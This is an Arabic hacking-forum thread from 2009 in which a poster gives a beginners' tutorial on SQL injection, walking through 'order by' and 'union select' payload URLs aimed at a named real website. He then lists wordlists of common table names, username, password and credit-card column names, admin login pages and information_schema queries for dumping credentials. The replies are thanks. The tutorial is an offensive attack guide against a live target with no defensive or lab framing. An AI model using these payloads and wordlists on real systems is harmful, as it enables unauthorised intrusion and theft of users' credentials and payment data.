شبه دوره لـ (mysql ) للمبتدئين

شروحات وطرق حقن البيانات sql واستغلالها في الاختراق


إضافة رد
قديم 01-15-2009
  #1
الهكر كير
صقر فعال
 
تاريخ التسجيل: Jul 2008
المشاركات: 86
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي



بدون مقدمات


<<


لايجيد المقدمات

لنفرض مثلآ انك وجدت هاذا الموقع


http://www.claimscompensation.com/news.php?id=1


رح تضيف بعد الرابط '

ليصبح هكذا


http://www.claimscompensation.com/news.php?id=1'



طبعا انت بتسالني بتقول وش استفيد بعد اضافة هاذا الرمز بعد الرابط

طيب انت لما اضفته هل تغير شئ بالصفحة ؟

بالطبع تغيرت الصفحة !!

اذاً هناك ثغرة SQL بهاذا الموقع بنسبة 75% طيب كيف اتاكد ان هناك ثغرة 100%

************************************************** *



أقولك تعال هات الرابط وقم بأضافة :-


http://www.claimscompensation.com/ne...1+order+by+1--


بعد الأضافة ماذا تلآحظ الصفحة تعود لوضعها الطبيعي ؟

طيب خلنا نجرب 2 و3 و4 و5 و6 الخ ---------- حتى توصل للرقم الي تطلع لك رسالة الخطاء فيه ..


http://www.claimscompensation.com/ne...1+order+by+2--


رح تقول ماتغير شئ !!

طيب تآبع :-

http://www.claimscompensation.com/ne...1+order+by+3--


تآبع للحين ماوصلنا للي نبيه !!


http://www.claimscompensation.com/ne...1+order+by+4--



وصلنا للرقم 11 مثلآ بتقولي وقف ياهكر كير فيه شئ تغير بالصفحة ..


http://www.claimscompensation.com/news.php...1+order+by+11--


************************************************** *


معناته شغلنا كله من 1 الى 10 بتقولي شلون !!

بقولك تابع كيف اطلع الأعمدة المصابة الي هي من 1 الى 10 ..

نضيف كلمة +union+select+ بدلاً من +order+by+

تابع كيف



http://www.claimscompensation.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10--



طبعا تلاحظ في رقمين طلعت بالصفحةتحت كلمة Related Articles باليسار !!

2 و 4

طيب وش بستفيد منها ؟؟

انا اقلك وش تستفيد منها
<_<


وهذي المعلومات تفيدك في الاستغلال لثغرهـ

الجداول

كود:
accounts
std_users
sys_user
mysql.db ++user
++users
++main
sf_user
tt_user
mo_user
mos_user
login
admin
mysql.user
mysql.users
admin_login
jos_users
jos_session
wp_users
bg_users
usuarios
login_username
user_login
admin_sections
members
================
================

()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()
اداة الربط concat(name,0x3a,password)
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()
اعمدة اليوزر
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()
كود:
 +login
+user
users
+username
+user_name
+admin
adminlogin
loginmember
membername
admin_lastname
lastname
fristname
uname
name
+user_login
aid
id
user_sections
user_username
user_id
user_first_name
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()
اعمدة الباسورد
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()

كود:
 ++password
admin_password
pass
passwd
pwd
user_pass
user_password
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()
لوحات الدخول
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()

كود:
logon.php
administrator
administrator.php
/admins/index.php ++admin
admin.php
++login
login.php
username
username.php
user
user.php
wp-login.php
main_login.php
admincp.php/index.html
()()()()()()()()()()()()()()()()()()()()()()()()() ()()()()

------------------------------------------------------
الاستعلامات

كود:
 table_name>from+information_schema.tables
column_name>from+information_schema.columns

+LIMIT+1+OFFSET+5
معرفة اصدار القاعده version()

+from+information_schema.tables+where+table_schema+not+in+('information_schema')
--------------
concat(column_name,0x3e,table_schema,0x2e,table_name)
------------------------------------------------------
--------------
الجداول
--------------
كود:


كود:
 4images_users
account
accounts
admin
admin
administer
administrable
administrate
administrator
administrators
administratrix
admins
client
clients
contact
contacts
content
cpg_bridge
cpg_config
dbadmins
dealer
dealers
fusion_new_users
fusion_user_groups
fusion_users
group
groups
ibf_admin_sessions
ibf_conf_settings
ibf_member_extra
ibf_members
ibf_members_converge
icq
jos_blastchatc_users
jos_comprofiler_members
jos_joomblog_users
jos_messages_cfg
jos_moschat_users
jos_users
kpro_adminlogs
kpro_user
login
logins
mb_users
member
members
minibbtable_users
mybb_forums
mybb_users
news
nuke_authors
nuke_bbconfig
nuke_config
nuke_popsettings
nuke_users
obb_profiles
partner
partners
passes
password
passwords
phorum_users
phpads_affiliates
phpads_clients
phpads_config
phpbb_users
products
punbb_users
pwd
pwds
reguser
regusers
sites
smf_members
sn_admins
system
usebb_members
usebb_name
user
user_list
user_logins
user_names
useralbums
userlist
userlogins
usernames
users
xar_roles
xoops_bannerclient
xoops_users
---------------
اعمدة
---------------


كود:
 tbl
users
news
admins
user
admin
regusers
reg_users
reguser
reg_user
account
accounts
member
members
settings
lostpass
lost_pass
lostpasswords
lost_passwords
logs
password
passwords
statistics
test
config
session
sessions
orders
customers
articles
links
main
clients
client
info
login
logins
group
groups
partner
partners
content
contact
contacts
icq
dealer
dealers
administration
---------------
اعمدة
---------------


كود:
 id
uid
username
login
userlogin
name
userpass
userpassword
pwd
pass
password
passwd
nick
icq
email
e-mail
mail
personal_key
temppass
temp_pass
temppasword
temp_password
user_pass
user_password
user_id
admin
last_login
user_ip
userip
ip_address
member_login_key
member_name
member_id
user_level
cc_type
cc_owner
cc_number
cc_expires
sesskey
****
data
group
usr
status
phone
member
account
hash
md5hash
salt
hashsalt
login_name
login_pw
login_pwd
pw
userpw
user_pwpas
pass
password
passwords
pasword
paswords
usrpas
usrpass
usrpassword
usrpasswords
usr_pas
usr_pass
usr_password
usr_passwords
userpas
userpass
userpassword
userpasswords
user_pas
user_pass
user_password
user_passwords
secretword
secretsword
secretswords
secret_word
secrets_word
secrets_words
passw
paswd
passwd
pwd
hash
key
keys
email
e-mail
mail
usrmail
usermail
usr_mail
user_mail
usremail
useremail
usr_email
user_email
id
usd
usrid
userid
usr_id
user_id
-
adid
admin
admin_email
admin_id
admin_pw
admin_pwd
adminemail
adminmail
aid
aim
aim_name
alb_password
album_id
albumname
blogmail_account
blogmail_password
board_email
cansendemail
ci_accountname
ci_email
cid
client
clientid
clientname
clientpassword
clientusername
converge_email
converge_id
converge_pass_hash
converge_pass_salt
data
db_database_name
db_hostname
db_password
db_username
displaygroupid
email
e-mail
email_full
email_pm
emailaddress
emailnotification
emailonpm
emailstamp
fid
forumname
gid
group
group_id
group_id_misc
group_name
hash
hashsalt
homepage
i_xar_roles_email
i_xar_roles_name
icq
icq_number
id
id_group
id_member
ip
ip_addr
ip_address
ipaddress
key
languageid
last_ip
last_login
lastname
legacy_password
license_number
login
login_anonymous
loginkey
mail
mapid
member
member_login_key
membergroupids
memberid
memberip
membername
msnname
name
org_perm_id
page_id
parentemail
partner
pass
passtemp
passwd
password
passworddate
passwordsalt
phone
pid
pntomail
pwd
pwd
realname
referenceid
referrerid
regip
registration_ip
reputationlevelid
salt
salt
secretanswer
secretquestion
sendemail
session_id
session_ip_address
session_member_id
session_member_login_key
session_member_name
short_name
showemail
sid
smtp_host
smtp_password
smtp_username
status
styleid
szemailaddress
table_prefix
uid
uname
usebb_bans
user
user_aim
user_email
user_hide_email
user_icq
user_id
user_ip
user_name
user_newpasswd
user_newpwdkey
user_password
user_table
user_viewemail
user_website
usergroupid
userid
userlogin
username
userpass
userpassword
usr
ustid
version
website
xar_email
xar_name
xar_pass
xar_uid
xar_uname
zip

تحياتى
الهـ ــ ـكـ ـر كـ ـيـ ـر
__________________
<div align='center'>ஜ۩۞۩ஜ₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪ஜ۩۞۩ ஜ</div>
الهكر كير غير متواجد حالياً  
رد مع اقتباس
قديم 01-15-2009
  #2
Dr.CracK
The Informer
 الصورة الرمزية Dr.CracK
 
تاريخ التسجيل: Sep 2008
الدولة: In the binry wold
العمر: 29
المشاركات: 2,015
شكراً: 0
تم شكره 61 مرة في 19 مشاركة
افتراضي

مشكور اخي بس كمان في اموامر واستعلامات اخرى
وان شاء الله بشرحها بالدورة
سلام
__________________
سبحان الله و بحمده سبحان الله العظيم
لا اله الا الله محمد رسول الله
------------------------------------


____________________________________________
Name Dr.CracK
Email :[email protected]
WwW.SoQoR.NeT
Dr.CracK غير متواجد حالياً  
رد مع اقتباس
قديم 01-15-2009
  #3
عبادي-99
صقر فعال
 
تاريخ التسجيل: Sep 2008
المشاركات: 122
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي

الف شكر
عبادي-99 غير متواجد حالياً  
رد مع اقتباس
قديم 01-15-2009
  #4
Miss.HacK
Programmer
 الصورة الرمزية Miss.HacK
 
تاريخ التسجيل: Sep 2008
الدولة: العـراق (بلاد النهرين)
العمر: 31
المشاركات: 1,341
شكراً: 59
تم شكره 55 مرة في 31 مشاركة
افتراضي

بارك الله فيك ياخوي
__________________
سبحان الله وبحمده *** سبحان الله العظيم
Miss.HacK غير متواجد حالياً  
رد مع اقتباس
قديم 01-16-2009
  #5
axxa
صقر جديد
 
تاريخ التسجيل: Apr 2008
المشاركات: 1
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي

بارك الله فيك
axxa غير متواجد حالياً  
رد مع اقتباس
قديم 01-16-2009
  #6
MĄЯLBǾЯǾ
 الصورة الرمزية MĄЯLBǾЯǾ
 
تاريخ التسجيل: Oct 2008
الدولة: KUWAIT
العمر: 26
المشاركات: 3,040
شكراً: 26
تم شكره 341 مرة في 81 مشاركة
افتراضي

مشكوووووووووووور اخي
MĄЯLBǾЯǾ غير متواجد حالياً  
رد مع اقتباس
قديم 01-16-2009
  #7
الهكر كير
صقر فعال
 
تاريخ التسجيل: Jul 2008
المشاركات: 86
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي

[email protected] اخي اشكرك على المرور الرائع ولكن متى راح تبدأ بالدوره علشان نتبادل خبرات فيها ونساعدك عليها

لكي يخف العناء عنك

واشكرك الاخون الذين مرو على الموضوع وادلو بالردود الرائعه

تقبلوا تحياتي
__________________
<div align='center'>ஜ۩۞۩ஜ₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪₪ஜ۩۞۩ ஜ</div>
الهكر كير غير متواجد حالياً  
رد مع اقتباس
قديم 12-10-2012
  #8
F!GO ~ HaCkeR
صقر نشيط
 الصورة الرمزية F!GO ~ HaCkeR
 
تاريخ التسجيل: Mar 2011
المشاركات: 65
شكراً: 0
تم شكره 4 مرة في 4 مشاركة
Cool رد: شبه دوره لـ (mysql ) للمبتدئين

مشكووور ياغالي والله موٍِوٍِضوٍِع رٍِأإئعِ :’ـ،,.
F!GO ~ HaCkeR غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
للمبتدئين, دوره, mysql, شبه

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
mysql injection tutorial Muslim4Ever !SQL 1nj3cton 4 03-26-2017 06:40 PM
كسر باسوورد الـ root في MySQL rober لغة الدلفى - Delphi Programming Language 12 12-10-2012 04:18 PM
دوره فى الفيجول بيزك للمبتدئين من فارس FaRiS منتدى لغات البرمجة 21 12-10-2012 04:17 PM
دوره الفوتو شوب للمبتدئين من فارس: الدرس الاول FaRiS منتدى لغات البرمجة 17 12-10-2012 04:16 PM
اختراق موقع MySQL.com ¥ŁĮĿŌ¥ Hackers News 5 04-27-2011 11:05 AM


الساعة الآن 01:10 AM.